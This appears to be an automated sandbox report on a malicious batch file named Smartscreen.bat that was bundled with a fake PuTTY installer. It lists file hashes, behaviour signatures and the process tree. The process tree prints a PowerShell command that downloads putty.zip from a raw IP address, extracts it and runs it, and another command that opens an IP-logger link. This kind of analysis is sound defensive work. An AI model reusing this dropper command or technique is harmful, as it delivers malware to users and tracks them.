Overview

overview

10

Static

static

3

66a5a52938...42.exe

windows7-x64

10

66a5a52938...42.exe

windows10-2004-x64

10

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

$PLUGINSDIR/UAC.dll

windows7-x64

3

$PLUGINSDIR/UAC.dll

windows10-2004-x64

3

$PLUGINSDI...fo.dll

windows7-x64

3

$PLUGINSDI...fo.dll

windows10-2004-x64

3

$PLUGINSDI...gs.dll

windows7-x64

3

$PLUGINSDI...gs.dll

windows10-2004-x64

3

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

$TEMP/putt...en.bat

windows7-x64

10

$TEMP/putt...en.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/05/2024, 19:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    $TEMP/putty/Smartscreen.bat

  • Size

    238B

  • MD5

    f6423b02fa9b2de5b162826b26c0dc56

  • SHA1

    01e7e79e6018c629ca11bc30f15a1a3e6988773e

  • SHA256

    59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83

  • SHA512

    5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://94.103.188.126/jerry/putty.zip

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$TEMP\putty\Smartscreen.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2916
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
      2⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3320
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb314046f8,0x7ffb31404708,0x7ffb31404718
        3⤵
          PID:3604
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
          3⤵
            PID:408
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4584
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
            3⤵
              PID:4916
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
              3⤵
                PID:4840
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                3⤵
                  PID:4812
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
                  3⤵
                    PID:1956
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
                    3⤵
                      PID:2164
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3208
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
                      3⤵
                        PID:2392
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
                        3⤵
                          PID:4604
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                          3⤵
                            PID:1920
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
                            3⤵
                              PID:3628
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6088
                          • C:\Windows\system32\tar.exe
                            tar -xf putty.zip
                            2⤵
                              PID:3628
                            • C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
                              C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
                              2⤵
                              • Executes dropped EXE
                              PID:436
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:2312
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4432

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                Filesize

                                152B

                                MD5

                                f53207a5ca2ef5c7e976cbb3cb26d870

                                SHA1

                                49a8cc44f53da77bb3dfb36fc7676ed54675db43

                                SHA256

                                19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23

                                SHA512

                                be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                Filesize

                                152B

                                MD5

                                ae54e9db2e89f2c54da8cc0bfcbd26bd

                                SHA1

                                a88af6c673609ecbc51a1a60dfbc8577830d2b5d

                                SHA256

                                5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af

                                SHA512

                                e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                Filesize

                                336B

                                MD5

                                245245fd78d9215c0e4c8b06c6d5910b

                                SHA1

                                4721e0cb2093c97b18dd63d061e92ee8fac19390

                                SHA256

                                6188a53c56d8e84a187cb3095b65def5691f54fd78571f07b60167fb0db6d3e2

                                SHA512

                                5e78277bdfd1bb477463abea5631b5aef608f03cbe032ecf02ff5f472d5ed9ab8b2651b8f7c2c378772026a41f104325e98dd878bfbecfeeee856deef5b19de1

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                Filesize

                                1KB

                                MD5

                                09604eb4cbb0080631664d11a892ea0b

                                SHA1

                                178f12424e27e1ea73856393e132dc063250febc

                                SHA256

                                5698f2871f10ef1adf97ac0eab894f9815bc1083645baf71ae2d5e7d9e7699f4

                                SHA512

                                1e7a5564122e89bb3bcf2774662b9695f90763ba200e0c6825f902ffc3bd5149b9176bb8090c69323e0782d1c53c77829485c3262d09ebdba24331833c6bf649

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                Filesize

                                1KB

                                MD5

                                86038c66a1de63d6e61197f1e4f30e28

                                SHA1

                                d576c10287f707af83ec605a10786662be32575d

                                SHA256

                                7ecd92e49b7be7c761cbf12170bf9492ed17d79ad7035d35aba05e4bc00db612

                                SHA512

                                d70280007e848230a278722098b73f9935224447c84ea1e2abb39fda252366b5b8d03d74179da43c757d34d75969696a1271caa3db7b6ee7c2edb945ccfdea7d

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                Filesize

                                5KB

                                MD5

                                f980b2ff094b696d35d3ffc4614923e4

                                SHA1

                                40198f36e3aa647d31adb14bbd0f6b9d9ae88755

                                SHA256

                                76e5924ab35f23dcde767847a97db1fea9695a9dc9aafbebeb3210c7ab540663

                                SHA512

                                26ad2be9984b435a06d3461e0b013092a3b9bc4bdd7df05a47a2724f421944da77c77aefef8efb0b06c7f3baa98cc79e16994549590accaa8b6f925e4c95637d

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                Filesize

                                6KB

                                MD5

                                f7b18ef92ecff70425868606e122847c

                                SHA1

                                5475a40a2be7f622db8539e17e36335ba976d2ad

                                SHA256

                                28bfe7b574a904db30a06a288074f4217afe0a76c0d5030aa795bab25c9e6fba

                                SHA512

                                07b055d8a25bfecb40926c074486cc53b604d17ca653a1752c4811dfae36c7e50355be211286192553643c5293a6aa5cde0b6ee18d2460efab1c0966df6d1181

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                Filesize

                                16B

                                MD5

                                6752a1d65b201c13b62ea44016eb221f

                                SHA1

                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                SHA256

                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                SHA512

                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\c0cea32a-2e76-4a82-b7f8-ea08abd4ef6c.tmp
                                Filesize

                                10KB

                                MD5

                                1dbc2b46c1824f8ba45b11210b6adf88

                                SHA1

                                6fcf4d3416d8357a96b08ae8fa1515b6537cce9d

                                SHA256

                                0c855556b290287af3855514fda51efe41729d14be29da4be91b8a53e01d0528

                                SHA512

                                89e776336afaf5b6a947e71c746fe760afaaf6fad2aae39b4887a3da1df94e64c4f9f12203d120bbbfb9d6dffbf9b9d73bd244845c8422468737988cff1b2f3e

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nd2bjy3r.fer.ps1
                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\putty.zip
                                Filesize

                                933KB

                                MD5

                                188fbf5c7b5748e1f750be2bab44e0a0

                                SHA1

                                525afccfc532830f71f068acfbf9ac49a1463539

                                SHA256

                                14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370

                                SHA512

                                62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
                                Filesize

                                1.6MB

                                MD5

                                7a9a33206f80078ba80f7a839cd92451

                                SHA1

                                55447378c48561c35bad1317b58a34ee50c5072f

                                SHA256

                                e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486

                                SHA512

                                61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba

                                Download Submit

                              • memory/2916-0-0x00007FFB22803000-0x00007FFB22805000-memory.dmp

                                Filesize

                                8KB

                                Download

                              • memory/2916-16-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

                                Filesize

                                10.8MB

                                Download

                              • memory/2916-12-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

                                Filesize

                                10.8MB

                                Download

                              • memory/2916-11-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

                                Filesize

                                10.8MB

                                Download

                              • memory/2916-6-0x000001F2E31D0000-0x000001F2E31F2000-memory.dmp

                                Filesize

                                136KB

                                Download